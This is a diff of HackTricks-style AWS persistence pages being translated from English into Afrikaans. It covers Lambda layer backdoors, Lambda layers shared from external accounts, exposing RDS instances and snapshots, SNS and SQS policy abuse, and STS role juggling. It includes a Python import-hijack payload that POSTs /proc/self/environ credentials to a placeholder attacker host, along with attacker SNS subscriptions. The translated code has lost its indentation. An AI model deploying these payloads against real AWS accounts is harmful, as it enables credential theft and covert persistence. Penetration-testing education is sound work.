'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
 ```
+En dit is die lys van **biblioteke** wat **lambda standaard ingesluit het**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
 
-And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
+### Lambda Laag Backdooring
 
-### Lambda Layer Backdooring
+In hierdie voorbeeld kom ons veronderstel dat die geteikende kode **`csv`** invoer. Ons gaan die **invoer van die `csv` biblioteek backdoor**.
 
-In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**.
+Om dit te doen, gaan ons die **gids csv** skep met die lêer **`__init__.py`** daarin in 'n pad wat deur lambda gelaai word: **`/opt/python/lib/python3.9/site-packages`**\
+Dan, wanneer die lambda uitgevoer word en probeer om **csv** te laai, sal ons **`__init__.py` lêer gelaai en uitgevoer word**.\
+Hierdie lêer moet:
 
-For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\
-Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\
-This file must:
-
-- Execute our payload
-- Load the original csv library
-
-We can do both with:
+- Ons payload uitvoer
+- Die oorspronklike csv biblioteek laai
 
+Ons kan albei doen met:
 ```python
 import sys
 from urllib import request
 
 with open("/proc/self/environ", "rb") as file:
-    url= "https://attacker13123344.com/" #Change this to your server
-    req = request.Request(url, data=file.read(), method="POST")
-    response = request.urlopen(req)
+url= "https://attacker13123344.com/" #Change this to your server
+req = request.Request(url, data=file.read(), method="POST")
+response = request.urlopen(req)
 
 # Remove backdoor directory from path to load original library
 del_path_dir = "/".join(__file__.split("/")[:-2])
@@ -90,29 +83,27 @@ import csv as _csv
 
 sys.modules["csv"] = _csv
 ```
+Dan, skep 'n zip met hierdie kode in die pad **`python/lib/python3.9/site-packages/__init__.py`** en voeg dit as 'n lambda-laag by.
 
-Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer.
+Jy kan hierdie kode vind in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
 
-You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
-
-The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated:
+Die geïntegreerde payload sal **die IAM kredensiale na 'n bediener stuur DIE EERSTE KEER wat dit aangeroep word of NA 'n reset van die lambda houer** (verandering van kode of koue lambda), maar **ander tegnieke** soos die volgende kan ook geïntegreer word:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
 {{#endref}}
 
-### External Layers
+### Eksterne Lae
 
-Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\
-Also note that the **max number of layers a lambda can have is 5**.
+Let daarop dat dit moontlik is om **lambda-lae van eksterne rekeninge** te gebruik. Boonop kan 'n lambda 'n laag van 'n eksterne rekening gebruik selfs al het dit nie toestemmings nie.\
+Let ook daarop dat die **maksimum aantal lae wat 'n lambda kan hê 5 is**.
 
-Therefore, in order to improve the versatility of this technique an attacker could:
-
-- Backdoor an existing layer of the user (nothing is external)
-- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**.
-  - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda)
-  - The victim **won't see external layers** used with **`aws lambda list-layers`**
+Daarom, om die veelsydigheid van hierdie tegniek te verbeter, kan 'n aanvaller:
 
+- 'n Buitelug in 'n bestaande laag van die gebruiker (niks is ekstern) 
+- **Skep** 'n **laag** in **sy rekening**, gee die **slagoffer rekening toegang** om die laag te gebruik, **konfigureer** die **laag** in die slagoffer se Lambda en **verwyder die toestemming**.
+- Die **Lambda** sal steeds in staat wees om die **laag** te **gebruik** en die **slagoffer sal** nie enige maklike manier hê om die **laag se kode af te laai** (behalwe om 'n rev shell binne die lambda te kry)
+- Die slagoffer **sal nie eksterne lae** sien wat gebruik word met **`aws lambda list-layers`**
 ```bash
 # Upload backdoor layer
 aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
@@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen
 # Remove permissions
 aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
index 88b0d082a..3bfc1378e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
@@ -1,37 +1,33 @@
-# AWS - Lightsail Persistence
+# AWS - Lightsail Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Lightsail
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-lightsail-enum.md
 {{#endref}}
 
-### Download Instance SSH keys & DB passwords
+### Laai Instansie SSH sleutels & DB wagwoorde af
 
-They won't be changed probably so just having them is a good option for persistence
+Hulle sal waarskynlik nie verander word nie, so om hulle te hê is 'n goeie opsie vir persistensie
 
-### Backdoor Instances
+### Agterdeur Instansies
 
-An attacker could get access to the instances and backdoor them:
+'n Aanvaller kan toegang tot die instansies verkry en hulle agterdeur:
 
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key**
-- Expose a port with port knocking with a backdoor
+- Gebruik 'n tradisionele **rootkit** byvoorbeeld
+- Voeg 'n nuwe **publieke SSH-sleutel** by
+- Stel 'n poort bloot met poortklop met 'n agterdeur
 
-### DNS persistence
+### DNS persistensie
 
-If domains are configured:
+As domeine gekonfigureer is:
 
-- Create a subdomain pointing your IP so you will have a **subdomain takeover**
-- Create **SPF** record allowing you to send **emails** from the domain
-- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
+- Skep 'n subdomein wat jou IP aandui sodat jy 'n **subdomein oorneem** sal hê
+- Skep **SPF** rekord wat jou toelaat om **e-posse** van die domein te stuur
+- Konfigureer die **hoofdomein IP na jou eie** en voer 'n **MitM** uit van jou IP na die wettige een
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
index b7a4b8f7b..0e1825177 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
@@ -1,35 +1,27 @@
-# AWS - RDS Persistence
+# AWS - RDS Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## RDS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
 {{#endref}}
 
-### Make instance publicly accessible: `rds:ModifyDBInstance`
-
-An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
+### Maak instansie publiek toeganklik: `rds:ModifyDBInstance`
 
+'n Aanvaller met hierdie toestemming kan **'n bestaande RDS-instansie wysig om publieke toeganklikheid te aktiveer**.
 ```bash
 aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
 ```
+### Skep 'n admin gebruiker binne die DB
 
-### Create an admin user inside the DB
-
-An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
-
-### Make snapshot public
+'n Aanvaller kan eenvoudig **'n gebruiker binne die DB skep** sodat selfs as die meester gebruiker se wagwoord gewysig word, hy **nie die toegang verloor** tot die databasis nie.
 
+### Maak snapshot publiek
 ```bash
 aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
index f2c4ce048..ad68f8c9a 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -1,29 +1,25 @@
-# AWS - S3 Persistence
+# AWS - S3 Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## S3
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-s3-athena-and-glacier-enum.md
 {{#endref}}
 
-### KMS Client-Side Encryption
+### KMS Kliënt-Syde Enkripsie
 
-When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
+Wanneer die enkripsieproses voltooi is, sal die gebruiker die KMS API gebruik om 'n nuwe sleutel te genereer (`aws kms generate-data-key`) en hy sal **die gegenereerde enkripteerde sleutel binne die metadata** van die lêer stoor ([python code voorbeeld](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) sodat wanneer die ontsleuteling plaasvind, dit dit weer met KMS kan ontsleutel:
 
 <figure><img src="../../../images/image (226).png" alt=""><figcaption></figcaption></figure>
 
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
+Daarom kan 'n aanvaller hierdie sleutel uit die metadata verkry en dit met KMS ontsleutel (`aws kms decrypt`) om die sleutel te verkry wat gebruik is om die inligting te enkripteer. Op hierdie manier sal die aanvaller die enkripsiesleutel hê en as daardie sleutel hergebruik word om ander lêers te enkripteer, sal hy dit kan gebruik.
 
-### Using S3 ACLs
+### Gebruik van S3 ACLs
 
-Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
+Alhoewel ACLs van emmers gewoonlik gedeaktiveer is, kan 'n aanvaller met genoeg voorregte dit misbruik (as dit geaktiveer is of as die aanvaller dit kan aktiveer) om toegang tot die S3-emmer te behou.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
index c15f27003..c416cc07a 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
@@ -1,57 +1,51 @@
-# AWS - Secrets Manager Persistence
+# AWS - Secrets Manager Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Secrets Manager
 
-For more info check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-secrets-manager-enum.md
 {{#endref}}
 
-### Via Resource Policies
+### Deur Hulpbronbeleide
 
-It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**.
+Dit is moontlik om **toegang tot geheime te verleen aan eksterne rekeninge** deur hulpbronbeleide. Kyk na die [**Secrets Manager Privesc-bladsy**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) vir meer inligting. Let daarop dat om **toegang tot 'n geheim' te verkry, die eksterne rekening ook **toegang tot die KMS-sleutel wat die geheim enkripteer** sal benodig.
 
-### Via Secrets Rotate Lambda
+### Deur Secrets Rotate Lambda
 
-To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself.
-
-This is how lambda code for such action could look like:
+Om **geheime** outomaties te **roteer**, word 'n geconfigureerde **Lambda** aangeroep. As 'n aanvaller die **kode** kon **verander**, kon hy direk die **nuwe geheim** na homself **uitvoer**.
 
+Dit is hoe lambda-kode vir so 'n aksie kan lyk:
 ```python
 import boto3
 
 def rotate_secrets(event, context):
-    # Create a Secrets Manager client
-    client = boto3.client('secretsmanager')
+# Create a Secrets Manager client
+client = boto3.client('secretsmanager')
 
-    # Retrieve the current secret value
-    secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
+# Retrieve the current secret value
+secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
 
-    # Rotate the secret by updating its value
-    new_secret_value = rotate_secret(secret_value)
-    client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
+# Rotate the secret by updating its value
+new_secret_value = rotate_secret(secret_value)
+client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
 
 def rotate_secret(secret_value):
-    # Perform the rotation logic here, e.g., generate a new password
+# Perform the rotation logic here, e.g., generate a new password
 
-    # Example: Generate a new password
-    new_secret_value = generate_password()
+# Example: Generate a new password
+new_secret_value = generate_password()
 
-    return new_secret_value
+return new_secret_value
 
 def generate_password():
-    # Example: Generate a random password using the secrets module
-    import secrets
-    import string
-    password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
-    return password
+# Example: Generate a random password using the secrets module
+import secrets
+import string
+password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
+return password
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
index 8e97cc81c..e9bcdcddc 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
@@ -1,85 +1,77 @@
-# AWS - SNS Persistence
+# AWS - SNS Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## SNS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
 {{#endref}}
 
-### Persistence
-
-When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
+### Persistensie
 
+Wanneer jy 'n **SNS onderwerp** skep, moet jy met 'n IAM-beleid **aangee wie toegang het om te lees en te skryf**. Dit is moontlik om eksterne rekeninge, ARN van rolle, of **selfs "\*"** aan te dui.\
+Die volgende beleid gee almal in AWS toegang om te lees en te skryf in die SNS onderwerp genaamd **`MySNS.fifo`**:
 ```json
 {
-  "Version": "2008-10-17",
-  "Id": "__default_policy_ID",
-  "Statement": [
-    {
-      "Sid": "__default_statement_ID",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": [
-        "SNS:Publish",
-        "SNS:RemovePermission",
-        "SNS:SetTopicAttributes",
-        "SNS:DeleteTopic",
-        "SNS:ListSubscriptionsByTopic",
-        "SNS:GetTopicAttributes",
-        "SNS:AddPermission",
-        "SNS:Subscribe"
-      ],
-      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
-      "Condition": {
-        "StringEquals": {
-          "AWS:SourceOwner": "318142138553"
-        }
-      }
-    },
-    {
-      "Sid": "__console_pub_0",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "SNS:Publish",
-      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
-    },
-    {
-      "Sid": "__console_sub_0",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "SNS:Subscribe",
-      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
-    }
-  ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__default_statement_ID",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"SNS:Publish",
+"SNS:RemovePermission",
+"SNS:SetTopicAttributes",
+"SNS:DeleteTopic",
+"SNS:ListSubscriptionsByTopic",
+"SNS:GetTopicAttributes",
+"SNS:AddPermission",
+"SNS:Subscribe"
+],
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
+"Condition": {
+"StringEquals": {
+"AWS:SourceOwner": "318142138553"
+}
+}
+},
+{
+"Sid": "__console_pub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Publish",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+},
+{
+"Sid": "__console_sub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Subscribe",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+}
+]
 }
 ```
+### Skep Tekeninge
 
-### Create Subscribers
-
-To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
-
-Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
+Om voort te gaan met die eksfiltrasie van al die boodskappe van al die onderwerpe, kan die aanvaller **tekeninge vir al die onderwerpe skep**.
 
+Let daarop dat as die **onderwerp van tipe FIFO** is, slegs tekeninge wat die protokol **SQS** gebruik, gebruik kan word.
 ```bash
 aws sns subscribe --region <region> \
-    --protocol http \
-    --notification-endpoint http://<attacker>/ \
-    --topic-arn <arn>
+--protocol http \
+--notification-endpoint http://<attacker>/ \
+--topic-arn <arn>
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
index 88f396173..a09336ba7 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
@@ -1,43 +1,37 @@
-# AWS - SQS Persistence
+# AWS - SQS Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## SQS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
 {{#endref}}
 
-### Using resource policy
-
-In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**:
+### Gebruik van hulpbronbeleid
 
+In SQS moet jy met 'n IAM-beleid **aangee wie toegang het om te lees en te skryf**. Dit is moontlik om eksterne rekeninge, ARN van rolle, of **selfs "\*"** aan te dui.\
+Die volgende beleid gee almal in AWS toegang tot alles in die wachtrij genaamd **MyTestQueue**:
 ```json
 {
-  "Version": "2008-10-17",
-  "Id": "__default_policy_ID",
-  "Statement": [
-    {
-      "Sid": "__owner_statement",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": ["SQS:*"],
-      "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
-    }
-  ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__owner_statement",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": ["SQS:*"],
+"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
+}
+]
 }
 ```
-
 > [!NOTE]
-> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
+> Jy kan selfs **'n Lambda in die aanvallers rekening aktiveer elke keer as 'n nuwe boodskap** in die waglyn geplaas word (jy sal dit op een of ander manier weer moet plaas). Volg hierdie instruksies: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
index c1b9a422b..c99c6f530 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
@@ -1,6 +1 @@
-# AWS - SSM Perssitence
-
-
-
-
-
+# AWS - SSM Persistensie
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
index 4e8c120ff..6ca9a8c06 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
@@ -1,25 +1,21 @@
-# AWS - Step Functions Persistence
+# AWS - Stap Funksies Volharding
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Step Functions
+## Stap Funksies
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-stepfunctions-enum.md
 {{#endref}}
 
-### Step function Backdooring
+### Stap funksie Agterdeur
 
-Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
+Agterdeur 'n stap funksie om dit te laat uitvoer enige volharding truuk sodat elke keer as dit uitgevoer word, dit jou kwaadwillige stappe sal uitvoer.
 
-### Backdooring aliases
+### Agterdeur aliase
 
-If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
+As die AWS-rekening aliase gebruik om stap funksies aan te roep, sal dit moontlik wees om 'n alias te wysig om 'n nuwe agterdeur weergawe van die stap funksie te gebruik.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
index 74db04bec..bb544ad9a 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
@@ -1,65 +1,62 @@
-# AWS - STS Persistence
+# AWS - STS Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## STS
 
-For more information access:
+Vir meer inligting, toegang:
 
 {{#ref}}
 ../aws-services/aws-sts-enum.md
 {{#endref}}
 
-### Assume role token
+### Neem rol token
 
-Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
+Tydelike tokens kan nie gelys word nie, so om 'n aktiewe tydelike token te handhaaf is 'n manier om persistensie te handhaaf.
 
 <pre class="language-bash"><code class="lang-bash">aws sts get-session-token --duration-seconds 129600
 
-# With MFA
+# Met MFA
 aws sts get-session-token \
-    --serial-number &#x3C;mfa-device-name> \
-    --token-code &#x3C;code-from-token>
+--serial-number &#x3C;mfa-device-name> \
+--token-code &#x3C;code-from-token>
 
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-<strong># SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-</strong># Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# Hardeware toestelnaam is gewoonlik die nommer van die agterkant van die toestel, soos GAHT12345678
+<strong># SMS toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:sms-mfa/gebruikersnaam
+</strong># Virtuele toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:mfa/gebruikersnaam
 </code></pre>
 
-### Role Chain Juggling
+### Rolketting Juggling
 
-[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
-
-You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+[**Rolketting is 'n erkende AWS kenmerk**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), wat dikwels gebruik word om stealth persistensie te handhaaf. Dit behels die vermoë om **'n rol aan te neem wat dan 'n ander aanneem**, wat moontlik terugkeer na die aanvanklike rol in 'n **sikliese manier**. Elke keer as 'n rol aangeneem word, word die vervaldatum van die geloofsbriewe verfris. Gevolglik, as twee rolle gekonfigureer is om mekaar wederkerig aan te neem, laat hierdie opstelling die perpetuele vernuwing van geloofsbriewe toe.
 
+Jy kan hierdie [**instrument**](https://github.com/hotnops/AWSRoleJuggler/) gebruik om die rolketting aan die gang te hou:
 ```bash
 ./aws_role_juggler.py -h
 usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]
 
 optional arguments:
-  -h, --help            show this help message and exit
-  -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
+-h, --help            show this help message and exit
+-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
 ```
-
 > [!CAUTION]
-> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+> Let daarop dat die [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) skrip van daardie Github-bewaarplek nie al die maniere vind waarop 'n rolketting gekonfigureer kan word nie.
 
 <details>
 
-<summary>Code to perform Role Juggling from PowerShell</summary>
-
+<summary>Code om Rol Juggling vanaf PowerShell uit te voer</summary>
 ```powershell
 # PowerShell script to check for role juggling possibilities using AWS CLI
 
 # Check for AWS CLI installation
 if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
-    Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
-    exit
+Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
+exit
 }
 
 # Function to list IAM roles
 function List-IAMRoles {
-    aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
+aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
 }
 
 # Initialize error count
@@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json
 
 # Attempt to assume each role
 foreach ($role in $roles) {
-    $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
-    try {
-        $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
-        if ($credentials) {
-            Write-Host "Successfully assumed role: $($role.RoleName)"
-            Write-Host "Access Key: $($credentials.AccessKeyId)"
-            Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
-            Write-Host "Session Token: $($credentials.SessionToken)"
-            Write-Host "Expiration: $($credentials.Expiration)"
+$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($credentials) {
+Write-Host "Successfully assumed role: $($role.RoleName)"
+Write-Host "Access Key: $($credentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
+Write-Host "Session Token: $($credentials.SessionToken)"
+Write-Host "Expiration: $($credentials.Expiration)"
 
-            # Set temporary credentials to assume the next role
-            $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
-            $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
-            $env:AWS_SESSION_TOKEN = $credentials.SessionToken
+# Set temporary credentials to assume the next role
+$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
+$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
+$env:AWS_SESSION_TOKEN = $credentials.SessionToken
 
-            # Try to assume another role using the temporary credentials
-            foreach ($nextRole in $roles) {
-                if ($nextRole.Arn -ne $role.Arn) {
-                    $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
-                    try {
-                        $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
-                        if ($nextCredentials) {
-                            Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
-                            Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
-                            Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
-                            Write-Host "Session Token: $($nextCredentials.SessionToken)"
-                            Write-Host "Expiration: $($nextCredentials.Expiration)"
-                        }
-                    } catch {
-                        $errorCount++
-                    }
-                }
-            }
+# Try to assume another role using the temporary credentials
+foreach ($nextRole in $roles) {
+if ($nextRole.Arn -ne $role.Arn) {
